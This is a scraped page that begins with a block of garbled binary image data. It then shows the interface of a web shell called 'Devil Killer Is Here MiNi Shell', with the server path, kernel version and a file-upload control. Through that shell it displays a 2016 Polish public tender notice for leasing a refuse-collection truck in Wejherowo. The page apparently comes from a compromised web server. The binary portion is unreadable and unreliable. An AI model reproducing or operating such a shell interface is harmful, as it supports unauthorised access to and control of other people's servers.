JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160216/33862-N-2016.html

<p class="kh_header"><b>Wejherowo: Dostawa w formie leasingu operacyjnego z opcją wykupu pojazdu do zbierania i transportu odpadów komunalnych dla Zakładu Usług Komunalnych w Wejherowie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 33862 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych w Wejherowie Sp. z o.o. , ul. Obrońców Helu 1, 84-200 Wejherowo, woj. pomorskie, tel. 58 6769520, faks 58 6769521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukwejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w formie leasingu operacyjnego z opcją wykupu pojazdu do zbierania i transportu odpadów komunalnych dla Zakładu Usług Komunalnych w Wejherowie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego z opcją wykupu fabrycznie nowego - rok produkcji min. 2015 r, pojazdu do zbierania i transportu odpadów.
2. Wykonawca zobowiązany będzie dostarczyć pojazd kompletny i gotowy do użytkowania w terminie nie później niż do dnia 18.05.2016 r.
3. Miejsce dostawy przedmiotu zamówienia: Zakładu Usług Komunalnych w Wejherowie Sp. z o.o., wjazd od ul. Staromłyńskiej, 84-200 Wejherowo.
4. Występujące w dokumentacji przetargowej określenia odwołujące się bezpośrednio do nazw własnych, norm, aprobat, specyfikacji technicznych i systemów odniesienia służą określeniu cech technicznych i jakościowych. Zamawiający dopuszcza rozwiązania równoważne z opisywanymi. Wykonawca powołujący się na rozwiązania równoważne opisanym przez Zamawiającego zobowiązany jest wykazać, iż spełniają one wymagania określone przez Zamawiającego.
5. Wszystkie określone w pkt. 6 parametry winny posiadać dokumenty potwierdzające zgodność z określonymi normami oraz atesty, świadectwa jakości, certyfikaty winny być dostarczone wraz z towarem, w przypadku wcześniejszego wezwania ze strony Zamawiającego.
6. Oferowany pojazd winien spełniać niżej wymienione wymagania:
a.	Podwozie:
1) Pojazd fabrycznie nowy, rok produkcji podwozia min. 2015., dwuosiowy z napędem na jedną oś.
2) Dopuszczalna masa całkowita: min 18 t
3)Silnik o mocy: min 250 km
4)Norma emisji spalin Euro 6
5)Rozstaw osi: max 3900 mm
6)Sprzęgło wzmocnione (grubość okładziny min 5 mm)
7)Ogranicznik prędkości jazdy 89 km/h
8)Ogranicznik prędkości 30 km/h
9)Skrzynia biegów min. 8 biegów do przodu
10)Przystawka odbioru mocy przystosowania do pracy ciągłej
11)Przednie zawieszenie paraboliczne: min 7,5 t
12)Stabilizator przedniej osi
13)Tylne zawieszenie pneumatyczne: min 12 t (min cztery poduszki powietrzne)
14)Oś napędowa o technicznej nośności konstrukcyjnej min 13 t
15)Blokada mechanizmu różnicowego tylnej osi
16)Przełożenie mostu napędowego dostosowanego do prac komunalnych
17)Zbiornik paliwa min 180 l zamykany na klucz z możliwością plombowania
18)Osuszacz powietrza podgrzewany
19)Szyba przednia podgrzewana
20)Stabilizator tylnej osi
21)Ogumienie 315/80 R 22,5
22)Zderzak stalowy
23)Hamulec przystankowy
24)Klimatyzacja bezfreonowa
25)ABS
26)2 akumulatory 12V 175 Ah
27)Światła do jazdy dziennej typu LED
28)Hamulce tarczowe osi przedniej i tylnej
29)Lusterka wsteczne ogrzewane i elektrycznie sterowane
30)Kabina trzyosobowa
31)Obicie drzwi zmywalne
32)Dodatkowe światła dalekosiężne i przeciwmgielne
33)Masa podwozia wraz z kabina: max 6000 kg
34)Przedświt z przodu oraz z tyłu pojazdu: min 220 mm
35)Radio
36)Kolor kabiny: RAL9010 - malowany fabrycznie
37)Kolor podwozia RAL 9011
38)Belka stroboskopowa koloru pomarańczowego zamontowana na dachu kabiny
39)Gwarancja na pojazd i zabudowę min 24 m-ce.
b.	Zabudowa:
1)Zabudowa skrzyniowa z urządzeniem załadowczym tylnym, o przekroju prostokątnym z podłogą płaską - gr min. 4 mm
2)Zabudowa fabrycznie nowa - rok produkcji 2016 r.
3)Skrzynia ładunkowa ożebrowana profilem stalowym
4)Pojemność skrzyni ładunkowej min. 15 m3
5)Skrzynia ładunkowa posiadająca drzwi kontrolne na bocznej ścianie
6)Objętość kosza zasypowego min. 1,5 m3
7)Odwłok wykonany z blachy trudnościeralnej, blacha typu Hardox: grubość blachy od 4 do 8 mm, wanna odwłoka grubość min. 8 mm
8)Mechanizm zgniatania liniowo-płytowy (szufladowy)
9)Stopień zagęszczenia odpadów: min. 1:5
10)Możliwość zmiany ciśnienia (stopnia zagęszczenia) w układzie hydraulicznym na min. trzy mniejsze wartości - przełączenie w pulpicie w kabinie kierowcy na warianty surowców wtórnych
11)Uniwersalne urządzenie załadowcze dostosowane do współpracy z pojemnikami do 100 do 1100 litrów ( w tym okrągłe 110 l)
12)Automatyczny przełącznik do ustawiania dwóch prędkości podnoszenia zasypu (pojemniki dwu i cztero kółkowe)
13)Możliwość regulacji wysokości wrzutnika w pionie
14)Czas opróżniania pojemników:
a)100 l - max. 8 sek.
b)1100 l - max. 11 sek.
15)Część tylna (odwłok) posiadająca automatyczne blokowanie i odblokowywanie
16)Przygotowanie wrzutnika do montażu anten RFID
17)Dwa siłowniki prasy zgniatającej umieszczone na zewnątrz odwłoka
18)Prowadnice płyty wypychającej umieszczone na bokach zabudowy
19)Układ uwalniania zakleszczonych przedmiotów
20)Króciec odpływowy w wannie załadowczej z kurkiem spustowym
21)Kamera wraz z mikrofonem umieszczona z tyłu zabudowy oraz monitor i głośnik zainstalowany w kabinie kierowcy
22)Dwa wyłączniki bezpieczeństwa
23)Sterownik dla automatycznego cyklu załadunku oraz cyklu pojedynczego
24)Sterowanie ręczne
25)Sterowanie urządzeniem zasypowym umieszczone po obu stronach odwłoka
26)Sterowanie płytą wypychającą (wysuwanie i wsuwanie) odbywa się z pulpitu znajdującego się przy siedzeniu w kabinie kierowcy
27)Możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy: prasy zagęszczającej, podnoszenie i opuszczania odwłoka oraz czasu pracy pompy hydraulicznej, przez osoby nadzorujące prace obsługi
28)Możliwość wykonania auto diagnozy sprawności układu elektrycznego przez urządzenie znajdujące się w kabinie kierowcy
29)Włączenie pompy hydraulicznej poprzez sprzęgło elektromagnetyczne
30)Krawędź zasypu: max. 1400 mm od podłoża
31)Dodatkowy blok hydrauliczny wraz z sensorem umożliwiającym zbiórkę frakcji szklanej
32)Zabudowa wykonana ze stali o podwyższonej odporności na ścieranie i korozję kilkakrotnie gruntowana i lakierowana
33)Kolor zabudowy RAL 6018 - zielony
34)Oświetlenie wg obowiązujących obecnie przepisów: światła hamowania, postojowe, kierunkowskazy, dwa światła alarmowe (kogut) z przodu i tyłu pojazdu, reflektor roboczy z tyłu
35)Pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku
36)Błotniki kół tylnych, pojedynczy długi chlapacz na całej długości wanny
37)Dwa stopnie dla ładowaczy wraz z czujnikami - automatyczna informacja w kabinie kierowcy o tym który stopień jest zajęty
38)Sygnał dźwiękowy przy cofaniu się pojazdu
39)Zabudowa musi odpowiadać wytycznym PN-EN1501 z późniejszymi zmianami i posiadać znak CE, parametry dotyczące skrzyni ładunkowej i wanny załadowczej według EN
40)Układ centralnego smarowania na smar stały
41)Złącze aplikacyjne dla systemu GPS (wyprowadzone sygnały: podnoszenia odwłoka, załączenia pompy, wypchnięcia płyty, podniesienia wrzutnika).
c.	Dodatkowe wymagania przedmiotu zamówienia:
1)Dokumenty niezbędne do rejestru pojazdu
2)Maksymalny czas reakcji serwisu w okresie gwarancyjnym - 24 godzin od momentu zgłoszenia, kolejne 24 h na przystąpienie do usunięcia awarii
3)Zapewnienie pojazdu zastępczego w przypadku usuwania awarii dłuższej niż 72 godzin od momentu rozpoczęcia w okresie gwarancji
4)Wyposażenie oraz dokumenty dopuszczające do ruchu drogowego w Polsce i umożliwiające eksploatację przekazane bezpośrednio po odbiorze
5)Punkt serwisowy dla podwozia znajdujący się w odległości od siedziby Zamawiającego nie więcej niż 100 km
6)Punkt serwisowy dla zabudowy znajdujący się w odległości od siedziby Zamawiającego nie więcej niż 100 km
7)Zapewnienie szkolenia pracowników Zamawiającego
8)Obowiązek dostarczenia przez wykonawcę instrukcji obsługi i zabudowy w języku polskim.

7.Wymagania dodatkowe związane z przedmiotem zamówienia:
1)Świadectwo homologacji dla skompletowanego pojazdu lub oświadczenie wykonawcy o dostarczeniu dokumentów niezbędnych do zarejestrowania kompletnego pojazdu w dniu przekazania do eksploatacji
2)Gwarancja na podwozie i zabudowę - minimum 24 miesiące. Wykonawca dostarczy kartę gwarancyjną określająca warunki serwisowania, okresy gwarancji, terminy usunięcia stwierdzających wad i usterek, a także wskazujące całość  świadczeń gwaranta na rzecz Zamawiającego oraz warunki odpowiedzialności gwaranta, w tym zobowiązanie do rozpoczęcia naprawy w terminie 48 godzin od momentu zgłoszenia (miejsce naprawy siedziba Zamawiającego)
3)Maksymalny czas przystąpienia do usuwania awarii w okresie gwarancyjnym - 72 godzin od momentu zgłoszenia awarii
4)W przypadku usuwania awarii dłużej niż 72 godzin od momentu rozpoczęcia w okresie gwarancji Wykonawca zobowiązany jest zapewnić pojazd zastępczy
5)Certyfikat bezpieczeństwa CE lub deklaracja zgodności WE
6)DTR
7)Nieodpłatna kalibracja tachografu przez okres obowiązywania gwarancji
8)Samochód musi posiadać niezbędne wyposażenie oraz dokumenty dopuszczające go do ruchu drogowego w Polsce i umożliwiające jego rejestrację i eksploatację bezpośrednio po odbiorze przez Zamawiającego
9)Dostawa kompletnego pojazdu nastąpi na koszt Wykonawcy do siedziby Zamawiającego
10)Wykonawca zobowiązany jest wskazać punkty serwisowe dla podwozia i zabudowy znajdujące się w odległości nie większej niż 100 km od siedziby Zamawiającego. Wykonawca zapewni przyjazd autoryzowanego serwisu w ciągu 48 godzin od pisemnego (fax., mail) zgłoszenia usterki
11)Wykonawca musi zapewnić szkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji samochodu i urządzeń
12)W dniu dostawy Wykonawca dostarczy instrukcje obsługi podwozia i zabudowy w języku polskim. Dokumentacja techniczna musi zawierać informację o ilości i rodzaju stosowanych olejów i płynów eksploatacyjnych w poszczególnych układach oraz wskazywać dostawców części. Wykonawca dostarczy także katalog części zamiennych wraz ze schematami układu hydraulicznego i elektrycznego w języku polskim
13)Wykonawca dostarczy z ofertą katalogi, prospekty, zdjęcia oraz wykaz wyposażenia zaoferowanej śmieciarki
14)Finansowanie przedmiotu zakupu nastąpi w drodze leasingu operacyjnego. Wykonawca jest zobowiązany do przedstawienia w ofercie warunków leasingu z uwzględnieniem następujących wymagań Zamawiającego:
a)Forma leasingu  - leasing operacyjny
b)Waluta - PLN
c)Opłata wstępna - w wysokości 10% ceny leasingu, płatna po podpisaniu umowy
d)Pozostałe raty leasingu, w 59 równych miesięcznych ratach płatnych do 15-stego każdego miesiąca
e)Wartość wykupu w wysokości 1% ceny przedmiotu leasingu (cena wykupu)
f)Zamawiający zobowiązuje się do wykupu przedmiotu leasingu a Wykonawca do jego sprzedaży po okresie trwania umowy
g)Raty leasingowe liczone wg oprocentowania stałego
h)Ubezpieczenie pojazdu przez Zamawiającego.

Dostawca (Leasingodawca), którego oferta zostanie wybrana będzie zobowiązany do zawarcia umowy leasingu.
Wzór umowy leasingu określający warunki leasingu z uwzględnieniem warunków określonych przez Zamawiającego Dostawca (Leasingodawca) dołącza do formularza oferty wraz z regulaminem obowiązującym u leasingodawcy (ogólne warunki leasingu).
Integralna część umowy stanowić będą załączniki: harmonogram opłat, protokół przekazania przedmiotu leasingu, opis przedmiotu leasingu wraz z wymaganymi dokumentami zgodnie z SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.11-3, 34.14.45.10-6, 66.11.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do przedłożenia razem z ofertą wadium przetargowego w wysokości:  20 000 zł (słownie: dwadzieścia tysięcy złotych 00/100).
2.Wadium musi obejmować okres związania ofertą.
3.Wadium może być wnoszone w następujących formach: 
a)pieniądzu, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych, 
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275)
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego: BANK MILLENNIUM SPÓŁKA AKCYJNA nr 37 1160 2202 0000 0000 6196 5678
5.Wadium wnoszone w poręczeniach lub gwarancjach należy złożyć w oryginale wraz ze składaną ofertą
6.Za wniesienie wadium w formie pieniężnej Zamawiający uważa wadium, które w terminie do dnia 23.02.2016 r. do godz. 10:15 znajdzie się na rachunku Zamawiającego
7.Kserokopię dowodu wniesienia wadium należy dołączyć do oferty
8. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza
9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
12. Poręczenia bankowe, gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości muszą nieodwołalnie 
i bezwarunkowo zobowiązywać Poręczyciela lub Gwaranta do zapłaty kwoty pieniężnej w ciągu 14 dni na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia zawartego w załączniku nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał należycie :
co najmniej trzy zamówienia polegające na dostawie pojazdu specjalistycznego do zbierania i transportu odpadów komunalnych typu śmieciarka ze skrzynią ożebrowaną profilami stalowymi o wartości nie mniejszej niż 400 tysięcy złotych netto w każdym zadaniu (potwierdzone dokumentami, że dostawa ta została wykonana należycie) - załączniku nr 4 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia zawartego w załączniku nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia zawartego w załączniku nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, przy czym kwota ubezpieczenia nie może być niższa niż 1.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
